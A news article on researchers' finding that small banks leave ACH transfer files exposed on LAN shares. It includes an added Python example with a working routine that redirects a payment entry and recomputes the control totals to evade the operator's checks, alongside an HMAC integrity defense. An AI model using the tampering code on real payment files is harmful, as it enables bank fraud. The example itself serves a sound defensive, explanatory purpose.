Atlanta -- Many banks with less than $50 billion in assets have a problem that payment systems like Apple Pay will make even more attractive to exploit, a team of security researchers says.
By altering electronic-transfer files before they are uploaded to the national transaction clearinghouse, criminals can redirect funds to accounts they control and make off with millions of dollars at a clip, according to researchers at TrustCC, a consultancy specializing in financial institution IT security.
They presented their findings at (ISC)² Security Congress 2014.
The problem is that many banks and credit unions place these sensitive files on their corporate LANs before uploading them, through an ACH operator, to the Automated Clearing House (ACH) system, the commercial network that processes a wide range of financial transactions. That leaves the files exposed to attackers who have already infiltrated the LAN.
While the attack isn't common yet, it could become more so as consumers shift from traditional magnetic-stripe credit cards to more secure chip-and-PIN cards and alternative payment systems such as Apple Pay. These more secure methods will mean more work for professional hackers, say TrustCC researchers Andy Robbins and Brandon Henry.
When that happens, criminals may seek to steal directly from banks, which will present easier targets with larger potential payoffs per compromise, they say. "Then banks are a pretty juicy target," Henry says.
Victims of the attack the researchers describe would be among the roughly 4,000 banks and credit unions in the U.S. that have less than $50 billion in assets – considered small banks. Larger banks – that actually control the vast majority of funds involved in ACH transfers – use an architecture that doesn’t expose the same vulnerability, Henry says.
But in smaller banks, batch files in ACH format are generally created in secure core networks. At the end of the day these files are shifted to shares on the corporate LAN to be reviewed by persons on the institutions’ accounting teams. Once approved, these files are sent to an ACH operator.
The flaw in the system is that ACH files are often left on shares for some period of time. If hackers can access them before the person in accounting does, they can alter them, Henry says.

The accountants verify the total of the file's credits and debits and the number of batches. Some institutions have fraud-analytics departments that dig into the files more deeply, but many just inspect the numbers in the batch and file control records. When the file is uploaded, the ACH operator verifies that it is free of arithmetic errors by checking the entry hash (a checksum built from the receiving banks' routing numbers) and the totals carried in those control records. So the attacker's code alters the fields that determine where an entry is paid, then recalculates the entry hash and control totals so they agree with the altered contents. If automated, the altering process takes about a tenth of a second using 35 lines of Python code. "It's so painfully simple any competent programmer could put this together in a day," he says.
These fraudulent transfers can easily go unnoticed for 24 hours, he says, but even if it’s a shorter period it’s certainly long enough for the criminals to shift the funds again and make them impossible to recover.
Before the exposed batch files can be altered, though, hackers first have to break into bank LANs and gain enough privileges to access the shares that contain them. Robbins says that in his penetration-testing experience, attackers can escalate to domain administrator in financial institutions about half the time using phishing in combination with other common hacking methods. Once they've done that, they can almost always find ACH files, he says.
The researchers have built a proof-of-concept of this attack that they say they have presented to various financial institution associations and to NACHA, which manages the development and administration of ACH. After two months of responsible disclosure, they decided to reveal it publicly. They have recently been in touch with NACHA and feel some progress is being made toward fixing the problem.
There are many ways to address the problem, but ultimately encryption needs to be baked into the file itself when it is created, Henry says.
All access to these files should be logged and write access should only be allowed for the core system. ACH workstations and terminals should have only read access.
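The following is an added example, not TrustCC's proof of concept or any vendor's code, that illustrates two things from this article at once: why the arithmetic in the control records (the entry hash and the debit/credit totals an accountant or ACH operator checks) does nothing to detect a file altered on a LAN share, and what "baking integrity into the file when it is created" can look like. It assumes NACHA-style 94-character fixed-width records with the commonly documented field positions, fills in only the fields it needs, and uses a keyed HMAC computed by the core system as a stand-in for the encryption or signing Henry recommends; the routing numbers, accounts, amounts, key and trace numbers are all constructed sample data.

```python
"""Added example (not TrustCC's code): ACH control totals are recomputable,
so they do not protect a batch file; a detached HMAC made at creation does.
Assumes NACHA-style 94-char records; all data below is constructed."""
import hmac
import hashlib
import math

RECORD_LEN = 94
FILE_HEADER = "101".ljust(RECORD_LEN)    # type 1: only priority code filled in
BATCH_HEADER = "5220".ljust(RECORD_LEN)  # type 5: service class 220 (credits)
PAD = "9" * RECORD_LEN                   # block padding records


def entry_detail(tx_code, rdfi, account, cents, name, trace):
    """Type-6 entry detail. rdfi = 8-digit routing id + check digit (not validated)."""
    rec = ("6" + tx_code + rdfi + account.ljust(17) + f"{cents:010d}"
           + " " * 15 + name.ljust(22) + "  " + "0" + trace)
    assert len(rec) == RECORD_LEN, "field widths must sum to 94"
    return rec


def entry_hash(entries):
    """Sum of the 8-digit receiving DFI ids (positions 4-11), last 10 digits kept."""
    return sum(int(r[3:11]) for r in entries) % 10 ** 10


def totals(entries):
    """(debits, credits) in cents; tx codes x7/x8/x9 are debits, x2/x3/x4 credits."""
    debits = sum(int(r[29:39]) for r in entries if r[2] in "789")
    credits = sum(int(r[29:39]) for r in entries if r[2] in "234")
    return debits, credits


def build_file(file_header, batch_header, entries):
    """Assemble the records and compute the type-8 and type-9 control records
    exactly as a core system (or an attacker rewriting the file) would."""
    ehash, (debits, credits), count = entry_hash(entries), totals(entries), len(entries)
    batch_ctl = ("8220" + f"{count:06d}" + f"{ehash:010d}" + f"{debits:012d}"
                 + f"{credits:012d}" + "1123456789" + " " * 25 + "09100001" + "0000001")
    recs = [file_header, batch_header, *entries, batch_ctl]
    blocks = math.ceil((len(recs) + 1) / 10)            # files are padded to 10-record blocks
    file_ctl = ("9" + f"{1:06d}" + f"{blocks:06d}" + f"{count:08d}" + f"{ehash:010d}"
                + f"{debits:012d}" + f"{credits:012d}" + " " * 39)
    recs.append(file_ctl)
    recs += [PAD] * (blocks * 10 - len(recs))
    return "\n".join(recs) + "\n"


def parse(text):
    return [r for r in text.splitlines() if r]


def sample_file():
    """Constructed two-entry payroll credit file, as the core system would create it."""
    entries = [
        entry_detail("22", "091000019", "000123456789", 150000, "ALICE SMITH", "091000010000001"),
        entry_detail("22", "121000248", "000987654321", 275050, "BOB JONES", "091000010000002"),
    ]
    return build_file(FILE_HEADER, BATCH_HEADER, entries)


def operator_check(text):
    """The arithmetic an ACH operator (and an accountant reading the control
    records) performs: do the control records agree with the entries?"""
    recs = parse(text)
    entries = [r for r in recs if r[0] == "6"]
    batch_ctl = next(r for r in recs if r[0] == "8")
    file_ctl = next(r for r in recs if r[0] == "9" and r != PAD)
    actual = (len(entries), entry_hash(entries)) + totals(entries)
    claimed_batch = tuple(int(batch_ctl[a:b]) for a, b in ((4, 10), (10, 20), (20, 32), (32, 44)))
    claimed_file = tuple(int(file_ctl[a:b]) for a, b in ((13, 21), (21, 31), (31, 43), (43, 55)))
    return claimed_batch == actual and claimed_file == actual


def redirect_entry(text, trace, new_rdfi, new_account):
    """What the tampering described in the article amounts to: change one entry's
    receiving bank and account (amount untouched), then rebuild the control
    records so the operator's arithmetic still balances."""
    recs = parse(text)
    entries = []
    for r in recs:
        if r[0] == "6" and r[79:94] == trace:
            r = r[:3] + new_rdfi + new_account.ljust(17) + r[29:]
        if r[0] == "6":
            entries.append(r)
    return build_file(recs[0], recs[1], entries)


def sign_file(text, key):
    """Integrity tag computed by the core system at creation time and kept off
    the LAN share (or delivered to the operator), so a later edit is detectable."""
    return hmac.new(key, text.encode(), hashlib.sha256).hexdigest()


def verify_file(text, key, tag):
    return hmac.compare_digest(sign_file(text, key), tag)


if __name__ == "__main__":
    KEY = b"core-system-only-key"   # assumption: the key never leaves the core system
    original = sample_file()
    tag = sign_file(original, KEY)
    tampered = redirect_entry(original, "091000010000002", "021000021", "000555555555")
    print("operator check, original:", operator_check(original))      # True
    print("operator check, tampered:", operator_check(tampered))      # True: totals can't tell
    print("HMAC check, tampered    :", verify_file(tampered, KEY, tag))  # False
```

The point of the example is the middle line of output: the redirected file passes the same entry-hash and total checks as the original, because every value the operator verifies is derived from the file's own contents and can be recomputed by whoever edits it. Only something the LAN-side editor cannot reproduce, here a tag under a key held by the core system, distinguishes the two files; in production that role is played by signing or encrypting the file at creation, with workstations holding read access only and every access logged, as the text recommends.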
Robbins acknowledged that the largest banks, those that account for the overwhelming majority of the monetary value of ACH transactions, upload transfers electronically straight from their core banking networks.
Some smaller banks outsource their core systems to service providers but still expose ACH files to their business networks, he says. Sometimes the providers place the core systems on the bank's own corporate LAN.